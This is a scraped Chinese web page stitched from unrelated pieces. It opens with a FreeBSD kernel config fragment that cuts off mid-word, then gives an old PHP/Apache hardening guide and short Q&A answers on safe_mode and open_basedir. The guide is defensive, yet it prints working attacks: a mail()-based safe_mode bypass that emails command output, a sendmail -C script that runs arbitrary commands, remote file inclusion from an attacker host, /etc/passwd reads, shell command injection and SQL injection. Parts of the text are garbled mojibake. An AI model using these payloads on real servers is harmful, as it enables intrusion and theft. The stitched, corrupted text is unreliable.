device atkbd0 at atkbdc? irq 1 flags 0x1
device psm0 at atkbdc? irq 12

device vga0 at isa?

# 啟動畫面和屏幕保護程序
pseudo-device splash

# syscons 是默認的控制台驅動，類似SCO控制台
device sc0 at isa? flags 0x100

# 對於pcvt vt220控制台，啟用這個和PCVT_FREEBSD
#device vt0 at isa?
#options XSERVER # 在vt控制台支持X伺服器
#options FAT_CURSOR # 使用大游標
# 如果你是用ThinkPad，將下面的一行和其他PCVT相關設備的注釋去掉
#options PCVT_SCANSET=2 # IBM使用非標准鍵盤

# 浮點運算支持 - 請勿禁用
device npx0 at nexus? port IO_NPX irq 13

# 電源管理支持
device apm0 at nexus? disable flags 0x20 # Advanced Power Management

# PCCARD (PCMCIA) 支持
device card
device pcic0 at isa? irq 0 port 0x3e0 iomem 0xd0000
device pcic1 at isa? irq 0 port 0x3e2 iomem 0xd4000 disable

# 串口(COM)
device sio0 at isa? port IO_COM1 flags 0x10 irq 4
device sio1 at isa? port IO_COM2 irq 3
device sio2 at isa? disable port IO_COM3 irq 5
device sio3 at isa? disable port IO_COM4 irq 9

# 並口
device ppc0 at isa? irq 7
device ppbus # 並口匯流排 (所有並口設備都需要)
device lpt # 列印機
device plip # 並口TCP/IP
device ppi # 並口介面設備
#device vpo # 需要scbus和da

# PCI 乙太網適配器
device de # DEC/Intel DC21x4x (``Tulip'')
device em # Intel PRO/1000 adapter Gigabit Ethernet Card (``Wiseman'')
device txp # 3Com 3cR990 (``Typhoon'')
device vx # 3Com 3c590, 3c595 (``Vortex'')

# 使用公共的MII匯流排控制器代碼的PCI乙太網適配器
# 注意：一定要保留'device miibus'以確保可用
device miibus # MII匯流排支持
device dc # DEC/Intel 21143 and various workalikes
device fxp # Intel EtherExpress PRO/100B (82557, 82558)
device pcn # AMD Am79C97x PCI 10/100 NICs
device rl # RealTek 8129/8139
device sf # Adaptec AIC-6915 (``Starfire'')
device sis # Silicon Integrated Systems SiS 900/SiS 7016
device ste # Sundance ST201 (D-Link DFE-550TX)
device tl # Texas Instruments ThunderLAN
device tx # SMC EtherPower II (83c170 ``EPIC'')
device vr # VIA Rhine, Rhine II
device wb # Winbond W89C840F
device xl # 3Com 3c90x (``Boomerang'', ``Cyclone'')
device bge # Broadcom BCM570x (``Tigon III'')

# ISA乙太網適配器
# 'device ed' 需要 'device miibus'
device ed0 at isa? port 0x280 irq 10 iomem 0xd8000
device ex
device ep
device fe0 at isa? port 0x300
# Xircom Ethernet
device xe
# PRISM I IEEE 802.11b wireless NIC.
device awi
# WaveLAN/IEEE 802.11 wireless NICs. Note: the WaveLAN/IEEE really
# exists only as a PCMCIA device, so there is no ISA attachment needed
# and resources will always be dynamically assigned by the pccard code.
device wi
# Aironet 4500/4800 802.11 wireless NICs. Note: the declaration below will
# work for PCMCIA and PCI cards, as well as ISA cards set to ISA PnP
# mode (the factory default). If you set the switches on your ISA
# card for a manually chosen I/O address and IRQ, you must specify
# those parameters here.
device an
# The probe order of these is presently determined by i386/isa/isa_compat.c.
device ie0 at isa? port 0x300 irq 10 iomem 0xd0000
#device le0 at isa? port 0x300 irq 5 iomem 0xd0000
device lnc0 at isa? port 0x280 irq 10 drq 0
device cs0 at isa? port 0x300
device sn0 at isa? port 0x300 irq 10

# 偽設備 - 數字表示分配多少個
pseudo-device loop # 環回網路
pseudo-de

⑺ php安全配置 如何配置使其更安全

一、Web伺服器安全

PHP其實不過是Web伺服器的一個模塊功能，所以首先要保證Web伺服器的安全。當然Web伺服器要安全又必須是先保證系統安全，這樣就扯遠了，無窮無盡。PHP可以和各種Web伺服器結合，這里也只討論Apache。非常建議以chroot方式安裝啟動Apache，這樣即使Apache和PHP及其腳本出現漏洞，受影響的也只有這個禁錮的系統，不會危害實際系統。但是使用chroot的Apache後，給應用也會帶來一定的麻煩，比如連接mysql時必須用127.0.0.1地址使用tcp連接而不能用localhost實現socket連接，這在效率上會稍微差一點。還有mail函數發送郵件也是個問題，因為php.ini里的：

[mail function]
; For Win32 only.
SMTP = localhost

; For Win32 only.
sendmail_from = [email protected]

都是針對Win32平台，所以需要在chroot環境下調整好sendmail。

二、PHP本身問題

1、遠程溢出

PHP-4.1.2以下的所有版本都存在文件上傳遠程緩沖區溢出漏洞，而且攻擊程序已經廣泛流傳，成功率非常高：

http://packetstormsecurity.org/0204-exploits/7350fun
http://hsj.shadowpenguin.org/misc/php3018_exp.txt

2、遠程拒絕服務

PHP-4.2.0和PHP-4.2.1存在PHP multipart/form-data POST請求處理遠程漏洞，雖然不能獲得本地用戶許可權，但是也能造成拒絕服務。

3、safe_mode繞過漏洞

還有PHP-4.2.2以下到PHP-4.0.5版本都存在PHP mail函數繞過safe_mode限制執行命令漏洞，4.0.5版本開始mail函數增加了第五個參數，由於設計者考慮不周可以突破safe_mode的限制執行命令。其中4.0.5版本突破非常簡單，只需用分號隔開後面加shell命令就可以了，比如存在PHP腳本evil.php：

<? mail("foo@bar,"foo","bar","",$bar); ?>

執行如下的URL：

http://foo.com/evil.php?bar=;/usr/bin/id|mail [email protected]

這將id執行的結果發送給[email protected]。

對於4.0.6至4.2.2的PHP突破safe_mode限制其實是利用了sendmail的-C參數，所以系統必須是使用sendmail。如下的代碼能夠突破safe_mode限制執行命令：

<?
# 注意，下面這兩個必須是不存在的，或者它們的屬主和本腳本的屬主是一樣
$script="/tmp/script123";
$cf="/tmp/cf123";

$fd = fopen($cf, "w");
fwrite($fd, "OQ/tmp
Sparse=0
R$*" . chr(9) . "$#local $@ $1 $: $1
Mlocal, P=/bin/sh, A=sh $script");
fclose($fd);

$fd = fopen($script, "w");
fwrite($fd, "rm -f $script $cf; ");
fwrite($fd, $cmd);
fclose($fd);

mail("nobody", "", "", "", "-C$cf");
?>

還是使用以上有問題版本PHP的用戶一定要及時升級到最新版本，這樣才能消除基本的安全問題。

三、PHP本身的安全配置

PHP的配置非常靈活，可以通過php.ini, httpd.conf, .htaccess文件（該目錄必須設置了AllowOverride All或Options）進行設置，還可以在腳本程序里使用ini_set()及其他的特定的函數進行設置。通過phpinfo()和get_cfg_var()函數可以得到配置選項的各個值。

如果配置選項是唯一PHP_INI_SYSTEM屬性的，必須通過php.ini和httpd.conf來修改，它們修改的是PHP的Master值，但修改之後必須重啟apache才能生效。其中php.ini設置的選項是對Web伺服器所有腳本生效，httpd.conf里設置的選項是對該定義的目錄下所有腳本生效。

如果還有其他的PHP_INI_USER, PHP_INI_PERDIR, PHP_INI_ALL屬性的選項就可以使用.htaccess文件設置，也可以通過在腳本程序自身用ini_set()函數設定，它們修改的是Local值，改了以後馬上生效。但是.htaccess只對當前目錄的腳本程序生效，ini_set()函數只對該腳本程序設置ini_set()函數以後的代碼生效。各個版本的選項屬性可能不盡相同，可以用如下命令查找當前源代碼的main.c文件得到所有的選項，以及它的屬性：

# grep PHP_INI_ /PHP_SRC/main/main.c

在討論PHP安全配置之前，應該好好了解PHP的safe_mode模式。

1、safe_mode

safe_mode是唯一PHP_INI_SYSTEM屬性，必須通過php.ini或httpd.conf來設置。要啟用safe_mode，只需修改php.ini：

safe_mode = On

或者修改httpd.conf，定義目錄：

<Directory /var/www>
Options FollowSymLinks
php_admin_value safe_mode 1
</Directory>

重啟apache後safe_mode就生效了。啟動safe_mode，會對許多PHP函數進行限制，特別是和系統相關的文件打開、命令執行等函數。
所有操作文件的函數將只能操作與腳本UID相同的文件，比如test.php腳本的內容為：

<?include("index.html")?>

幾個文件的屬性如下：

# ls -la
total 13
drwxr-xr-x 2 root root 104 Jul 20 01:25 .
drwxr-xr-x 16 root root 384 Jul 18 12:02 ..
-rw-r--r-- 1 root root 4110 Oct 26 2002 index.html
-rw-r--r-- 1 www-data www-data 41 Jul 19 19:14 test.php

在瀏覽器請求test.php會提示如下的錯誤信息：

Warning: SAFE MODE Restriction in effect. The script whose uid/gid is 33/33 is not allowed to access ./index.html owned by uid/gid 0/0 in /var/www/test.php on line 1

如果被操作文件所在目錄的UID和腳本UID一致，那麼該文件的UID即使和腳本不同也可以訪問的，不知這是否是PHP的一個漏洞還是另有隱情。所以php腳本屬主這個用戶最好就只作這個用途，絕對禁止使用root做為php腳本的屬主，這樣就達不到safe_mode的效果了。

如果想將其放寬到GID比較，則打開 safe_mode_gid可以考慮只比較文件的GID，可以設置如下選項：

safe_mode_gid = On

設置了safe_mode以後，所有命令執行的函數將被限制只能執行php.ini里safe_mode_exec_dir指定目錄里的程序，而且shell_exec、`ls -l`這種執行命令的方式會被禁止。如果確實需要調用其它程序，可以在php.ini做如下設置：

safe_mode_exec_dir = /usr/local/php/exec

然後拷貝程序到該目錄，那麼php腳本就可以用system等函數來執行該程序。而且該目錄里的shell腳本還是可以調用其它目錄里的系統命令。

safe_mode_include_dir string
當從此目錄及其子目錄（目錄必須在 include_path 中或者用完整路徑來包含）包含文件時越過 UID/GID 檢查。

從 PHP 4.2.0 開始，本指令可以接受和 include_path 指令類似的風格用分號隔開的路徑，而不只是一個目錄。

指定的限制實際上是一個前綴，而非一個目錄名。這也就是說「safe_mode_include_dir = /dir/incl」將允許訪問「/dir/include」和「/dir/incls」，如果它們存在。如果您希望將訪問控制在一個指定的目錄，那麼請在結尾加上一個斜線，例如：「safe_mode_include_dir = /dir/incl/」。

safe_mode_allowed_env_vars string
設置某些環境變罧贍蓯喬痹詰陌踩?笨凇1局噶畎??幸桓齠漢歐指艫那白毫斜懟T詘踩?J較攏?沒е荒芨謀淠切┟?志哂性謖飫鍰峁┑那白旱幕肪潮淞俊D?杴榭魷攏?沒е荒萇柚靡?PHP_ 開頭的環境變數（例如 PHP_FOO = BAR）。

注: 如果本指令為空，PHP 將使用戶可以修改任何環境變數！

safe_mode_protected_env_vars string
本指令包含有一個逗號分隔的環境變數的列表，最終用戶不能用 putenv() 來改變這些環境變數。甚至在 safe_mode_allowed_env_vars 中設置了允許修改時也不能改變這些變數。

雖然safe_mode不是萬能的（低版本的PHP可以繞過），但還是強烈建議打開安全模式，在一定程度上能夠避免一些未知的攻擊。不過啟用safe_mode會有很多限制，可能對應用帶來影響，所以還需要調整代碼和配置才能和諧。被安全模式限制或屏蔽的函數可以參考PHP手冊。

討論完safe_mode後，下面結合程序代碼實際可能出現的問題討論如何通過對PHP伺服器端的配置來避免出現的漏洞。

2、變數濫用

PHP默認register_globals = On，對於GET, POST, Cookie, Environment, Session的變罧梢災苯幼⒉岢扇?直淞俊K?塹淖⒉崴承蚴莢ariables_order = "EGPCS"（可以通過php.ini修改），同名變數variables_order右邊的覆蓋左邊，所以變數的濫用極易造成程序的混亂。而且腳本程序員往往沒有對變數初始化的習慣，像如下的程序片斷就極易受到攻擊：

<?
//test_1.php

if ($pass == "hello")
$auth = 1;

if ($auth == 1)
echo "some important information";
else
echo "nothing";
?>

攻擊者只需用如下的請求就能繞過檢查：
http://victim/test_1.php?auth=1

這雖然是一個很弱智的錯誤，但一些著名的程序也有犯過這種錯誤，比如phpnuke的遠程文件拷貝漏洞http://www.securityfocus.com/bid/3361

PHP-4.1.0發布的時候建議關閉register_globals，並提供了7個特殊的數組變數來使用各種變數。對於從GET、POST、COOKIE等來的變數並不會直接注冊成變數，必需通過數組變數來存取。PHP-4.2.0發布的時候，php.ini默認配置就是register_globals = Off。這使得程序使用PHP自身初始化的默認值，一般為0，避免了攻擊者控制判斷變數。

解決方法：

配置文件php.ini設置register_globals = Off。

要求程序員對作為判斷的變數在程序最開始初始化一個值。

3、文件打開

極易受攻擊的代碼片斷：

<?
//test_2.php

if (!($str = readfile("$filename"))) {
echo("Could not open file: $filename<BR>\n");
exit;
}
else {
echo $str;
}
?>

由於攻擊者可以指定任意的$filename，攻擊者用如下的請求就可以看到/etc/passwd：

http://victim/test_2.php?filename=/etc/passwd

如下請求可以讀php文件本身：

http://victim/test_2.php?filename=test_2.php

PHP中文件打開函數還有fopen(), file()等，如果對文件名變數檢查不嚴就會造成伺服器重要文件被訪問讀取。

解決方法：

如非特殊需要，把php的文件操作限制在web目錄裡面。以下是修改apache配置文件httpd.conf的一個例子：

<Directory /usr/local/apache/htdocs>
php_admin_value open_basedir /usr/local/apache/htdocs
</Directory>

重啟apache後，/usr/local/apache/htdocs目錄下的PHP腳本就只能操作它自己目錄下的文件了，否則PHP就會報錯：

Warning: open_basedir restriction in effect. File is in wrong directory in xxx on line xx.

使用safe_mode模式也能避免這種問題，前面已經討論過了。

4、包含文件

極易受攻擊的代碼片斷：

<?
//test_3.php

if(file_exists($filename))
include("$filename");
?>

這種不負責任的代碼會造成相當大的危害，攻擊者用如下請求可以得到/etc/passwd文件：

http://victim/test_3.php?filename=/etc/passwd

如果對於Unix版的PHP（Win版的PHP不支持遠程打開文件）攻擊者可以在自己開了http或ftp服務的機器上建立一個包含shell命令的文件，http://attack/attack.txt的內容是<?passthru("ls /etc")?>，那麼如下的請求就可以在目標主機執行命令ls /etc：

http://victim/test_3.php?filename=http://attack/attack.txt

攻擊者甚至可以通過包含apache的日誌文件access.log和error.log來得到執行命令的代碼，不過由於干擾信息太多，有時不易成功。
對於另外一種形式，如下代碼片斷：

<?
//test_4.php

include("$lib/config.php");
?>

攻擊者可以在自己的主機建立一個包含執行命令代碼的config.php文件，然後用如下請求也可以在目標主機執行命令：

http://victim/test_4.php?lib=http://attack

PHP的包含函數有include(), include_once(), require(), require_once。如果對包含文件名變數檢查不嚴就會對系統造成嚴重危險，可以遠程執行命令。

解決方法：

要求程序員包含文件里的參數盡量不要使用變數，如果使用變數，就一定要嚴格檢查要包含的文件名，絕對不能由用戶任意指定。

如前面文件打開中限制PHP操作路徑是一個必要的選項。另外，如非特殊需要，一定要關閉PHP的遠程文件打開功能。修改php.ini文件：

allow_url_fopen = Off

重啟apache。

5、文件上傳

php的文件上傳機制是把用戶上傳的文件保存在php.ini的upload_tmp_dir定義的臨時目錄（默認是系統的臨時目錄，如：/tmp）里的一個類似phpxXuoXG的隨機臨時文件，程序執行結束，該臨時文件也被刪除。PHP給上傳的文件定義了四個變數：（如form變數名是file，而且register_globals打開）

$file #就是保存到伺服器端的臨時文件（如/tmp/phpxXuoXG ）
$file_size #上傳文件的大小
$file_name #上傳文件的原始名稱
$file_type #上傳文件的類型

推薦使用：

$HTTP_POST_FILES[file][tmp_name]
$HTTP_POST_FILES[file][size]
$HTTP_POST_FILES[file][name]
$HTTP_POST_FILES[file][type]

這是一個最簡單的文件上傳代碼：

<?
//test_5.php

if(isset($upload) && $file != "none") {
($file, "/usr/local/apache/htdocs/upload/".$file_name);
echo "文件".$file_name."上傳成功！點擊<a href=\"$PHP_SELF\">繼續上傳</a>";
exit;
}
?>
<html>
<head>
<title>文件上傳</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body bgcolor="#FFFFFF">
<form enctype="multipart/form-data" method="post">
上傳文件:
<input type="file" name="file" size="30">
<input type="submit" name="upload" value="上傳">
</form>
</body>
</html>

這樣的上傳代碼存在讀取任意文件和執行命令的重大問題。
下面的請求可以把/etc/passwd文檔拷貝到web目錄/usr/local/apache/htdocs/test（注意：這個目錄必須nobody可寫）下的attack.txt文件里：

http://victim/test_5.php?upload= ... ile_name=attack.txt

然後可以用如下請求讀取口令文件：

http://victim/test/attack.txt

攻擊者可以把php文件拷貝成其它擴展名，泄漏腳本源代碼。
攻擊者可以自定義form里file_name變數的值，上傳覆蓋任意有寫許可權的文件。
攻擊者還可以上傳PHP腳本執行主機的命令。

解決方法：

PHP-4.0.3以後提供了is_uploaded_file和move_uploaded_file函數，可以檢查操作的文件是否是用戶上傳的文件，從而避免把系統文件拷貝到web目錄。
使用$HTTP_POST_FILES數組來讀取用戶上傳的文件變數。
嚴格檢查上傳變數。比如不允許是php腳本文件。

把PHP腳本操作限制在web目錄可以避免程序員使用函數把系統文件拷貝到web目錄。move_uploaded_file不受open_basedir的限制，所以不必修改php.ini里upload_tmp_dir的值。
把PHP腳本用phpencode進行加密，避免由於操作泄漏源碼。
嚴格配置文件和目錄的許可權，只允許上傳的目錄能夠讓nobody用戶可寫。
對於上傳目錄去掉PHP解釋功能，可以通過修改httpd.conf實現：

<Directory /usr/local/apache/htdocs/upload>
php_flag engine off
#如果是php3換成php3_engine off
</Directory>

重啟apache，upload目錄的php文件就不能被apache解釋了，即使上傳了php文件也沒有問題，只能直接顯示源碼。

6、命令執行

下面的代碼片斷是從PHPNetToolpack摘出，詳細的描述見：

http://www.securityfocus.com/bid/4303

<?
//test_6.php

system("traceroute $a_query",$ret_strs);
?>

由於程序沒有過濾$a_query變數，所以攻擊者可以用分號來追加執行命令。

攻擊者輸入如下請求可以執行cat /etc/passwd命令：

http://victim/test_6.php?a_query=www.example.com;cat /etc/passwd

PHP的命令執行函數還有system(), passthru(), popen()和``等。命令執行函數非常危險，慎用。如果要使用一定要嚴格檢查用戶輸入。

解決方法：

要求程序員使用escapeshellcmd()函數過濾用戶輸入的shell命令。

啟用safe_mode可以杜絕很多執行命令的問題，不過要注意PHP的版本一定要是最新的，小於PHP-4.2.2的都可能繞過safe_mode的限制去執行命令。

7、sql_inject

如下的SQL語句如果未對變數進行處理就會存在問題：

select * from login where user=$user and pass=$pass

攻擊者可以用戶名和口令都輸入1 or 1=1繞過驗證。

不過幸虧PHP有一個默認的選項magic_quotes_gpc = On，該選項使得從GET, POST, COOKIE來的變數自動加了addslashes()操作。上面SQL語句變成了：

select * from login where user=1\ or 1=\1 and pass=1\ or 1=\1

從而避免了此類sql_inject攻擊。

對於數字類型的欄位，很多程序員會這樣寫：

select * from test where id=$id

由於變數沒有用單引號擴起來，就會造成sql_inject攻擊。幸虧MySQL功能簡單，沒有sqlserver等資料庫有執行命令的SQL語句，而且PHP的mysql_query()函數也只允許執行一條SQL語句，所以用分號隔開多條SQL語句的攻擊也不能奏效。但是攻擊者起碼還可以讓查詢語句出錯，泄漏系統的一些信息，或者一些意想不到的情況。

解決方法：

要求程序員對所有用戶提交的要放到SQL語句的變數進行過濾。
即使是數字類型的欄位，變數也要用單引號擴起來，MySQL自己會把字串處理成數字。
在MySQL里不要給PHP程序高級別許可權的用戶，只允許對自己的庫進行操作，這也避免了程序出現問題被 SELECT INTO OUTFILE ... 這種攻擊。

8、警告及錯誤信息

PHP默認顯示所有的警告及錯誤信息：

error_reporting = E_ALL & ~E_NOTICE
display_errors = On

在平時開發調試時這非常有用，可以根據警告信息馬上找到程序錯誤所在。
正式應用時，警告及錯誤信息讓用戶不知所措，而且給攻擊者泄漏了腳本所在的物理路徑，為攻擊者的進一步攻擊提供了有利的信息。而且由於自己沒有訪問到錯誤的地方，反而不能及時修改程序的錯誤。所以把PHP的所有警告及錯誤信息記錄到一個日誌文件是非常明智的，即不給攻擊者泄漏物理路徑，又能讓自己知道程序錯誤所在。

修改php.ini中關於Error handling and logging部分內容：

error_reporting = E_ALL
display_errors = Off
log_errors = On
error_log = /usr/local/apache/logs/php_error.log

然後重啟apache，注意文件/usr/local/apache/logs/php_error.log必需可以讓nobody用戶可寫。

9、disable_functions

如果覺得有些函數還有威脅，可以設置php.ini里的disable_functions（這個選項不能在httpd.conf里設置），比如：

disable_functions = phpinfo, get_cfg_var

可以指定多個函數，用逗號分開。重啟apache後，phpinfo, get_cfg_var函數都被禁止了。建議關閉函數phpinfo, get_cfg_var，這兩個函數容易泄漏伺服器信息，而且沒有實際用處。

10、disable_classes

這個選項是從PHP-4.3.2開始才有的，它可以禁用某些類，如果有多個用逗號分隔類名。disable_classes也不能在httpd.conf里設置，只能在php.ini配置文件里修改。

11、open_basedir

前面分析常式的時候也多次提到用open_basedir對腳本操作路徑進行限制，這里再介紹一下它的特性。用open_basedir指定的限制實際上是前綴，不是目錄名。也就是說 "open_basedir = /dir/incl" 也會允許訪問 "/dir/include" 和 "/dir/incls"，如果它們存在的話。如果要將訪問限制在僅為指定的目錄，用斜線結束路徑名。例如："open_basedir = /dir/incl/"。
可以設置多個目錄，在Windows中，用分號分隔目錄。在任何其它系統中用冒號分隔目錄。作為Apache模塊時，父目錄中的open_basedir路徑自動被繼承。

四、其它安全配置

1、取消其它用戶對常用、重要系統命令的讀寫執行許可權

一般管理員維護只需一個普通用戶和管理用戶，除了這兩個用戶，給其它用戶能夠執行和訪問的東西應該越少越好，所以取消其它用戶對常用、重要系統命令的讀寫執行許可權能在程序或者服務出現漏洞的時候給攻擊者帶來很大的迷惑。記住一定要連讀的許可權也去掉，否則在linux下可以用/lib/ld-linux.so.2 /bin/ls這種方式來執行。
如果要取消某程如果是在chroot環境里，這個工作比較容易實現，否則，這項工作還是有些挑戰的。因為取消一些程序的執行許可權會導致一些服務運行不正常。PHP的mail函數需要/bin/sh去調用sendmail發信，所以/bin/bash的執行許可權不能去掉。這是一項比較累人的工作，

2、去掉apache日誌其它用戶的讀許可權

apache的access-log給一些出現本地包含漏洞的程序提供了方便之門。通過提交包含PHP代碼的URL，可以使access-log包含PHP代碼，那麼把包含文件指向access-log就可以執行那些PHP代碼，從而獲得本地訪問許可權。
如果有其它虛擬主機，也應該相應去掉該日誌文件其它用戶的讀許可權。

當然，如果你按照前面介紹的配置PHP那麼一般已經是無法讀取日誌文件了。

⑻ 打開php.ini中的Safe_mode，會影響哪些參數至少說出6個。

system,passthru,exec,shell_exec,popen,phpinfo等等大部分的文件操作函數。
因為Safe_mode是php非常重要的內嵌的安全機制。默認是關閉的。

⑼ php配置防跨站、防跨目錄安全

現在很多網站都是採用php建站，不少都是直接使用現在成熟的cms程序，這些php開發的cms系統本身安全性可能並不高，這時就需要我們在伺服器做一些針對php程序配置防跨站、防跨目錄等一些設置，可以有效的防止伺服器上所有的php網站被惡意篡改。
適用范圍及演示系統
適用范圍：php5.3及以上版本
演示系統：centos
防跨站、防跨目錄安全設置方法
第1步：登錄到linux系統終端。
第2步：找到並打開php配置文件。
第3步：在php.ini最底部添加以下代碼，並保存。大家可就按以下代碼改成自己網站的配置即可。
[HOST=www.45it.com]
open_basedir=/wwwroot/www.45it.com/:/tmp/
[PATH=/wwwroot/www.45it.com]
open_basedir=/wwwroot/www.45it.com/:/tmp/
註：就如上代碼添加完之後就是防跨站防跨目錄的安全配置了，但是有一些缺點，就是比如說我們運行一些php探針等一些程序可能就是無法正常運行了，如果想讓網站正常運行php探針的話需要在/tmp/後加上:/proc/
第4步：添加完代碼並保存php.ini，之後重啟php服務即可生效。

⑽ 如何關閉php安全模式

php安全模式：safe_mode=on|off
啟用safe_mode指令將對在共享環碰瞎境中使用PHP時可能有危險的語言特性有所限制。可以
將safe_mode是指為布爾值on來啟用，或者設置為
off禁用。它會比較執行腳本UID（用戶ID）和腳本嘗試訪問的文件的UID，以此作為限制機制雹吵源的基礎。如果UID相同，則執行腳本；否則，腳本失敗。
具體地，當啟用安全模式時，一些限制將生效。
1、
所有輸入輸出函數（例如fopen()、file()和require()）的適用會受到限制，只能用於與調用這些函數的腳本有相同擁有者的文件。例如源態，
假定啟用了安全模式，如果Mary擁有的腳本調用fopen(),嘗試打開由Jonhn擁有的一個文件，則將失敗。但是，如果Mary不僅擁有調用
fopen()的腳本，還擁有fopen()所調用的文件，就會成功。
2、如果試圖通過函數popen()、system()或exec()等執行腳本，只有當腳本位於safe_mode_exec_dir配置指令指定的目錄才可能。
3、HTTP驗證得到進一步加強，因為驗證腳本用於者的UID劃入驗證領域范圍內。此外，當啟用安全模式時，不會設置PHP_AUTH。
4、如果適用MySQL資料庫伺服器，鏈接MySQL伺服器所用的用戶名必須與調用mysql_connect()的文件擁有者用戶名相同。